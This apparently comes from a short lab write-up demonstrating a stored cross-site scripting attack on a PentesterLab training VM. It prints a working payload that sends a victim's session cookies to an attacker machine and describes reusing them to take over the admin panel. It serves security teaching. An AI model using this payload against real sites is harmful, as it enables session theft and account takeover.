XSS Cookie Steal

Here we demonstrate why you should be filtering any user input.

This shows how easy it is for an attacker to plant some malicious code on a site and steal the admin login credentials (Or another user), by using Cross-Site-Scripting. There is a great explanation on OWASP’s website.

First we test the text areas for correct input validation and when we find it is not being correctly checked we then look to exploit that flaw.

By enclosing the following in script tags “document.write(‘<img src=”http://192.168.56.104/?’+document.cookie+’ “/>’);” we can send the stolen cookies to our PC and then reuse them on the site to gain access to the admin panel and from there we can add  malicious code, create new users or look to get root access on the server.

The site is on 192.168.56.103 and our attacking machine is on 192.168.56.104.

To demostrate this we are using the “XSS and MySQL File” VM from Pentesterlab.com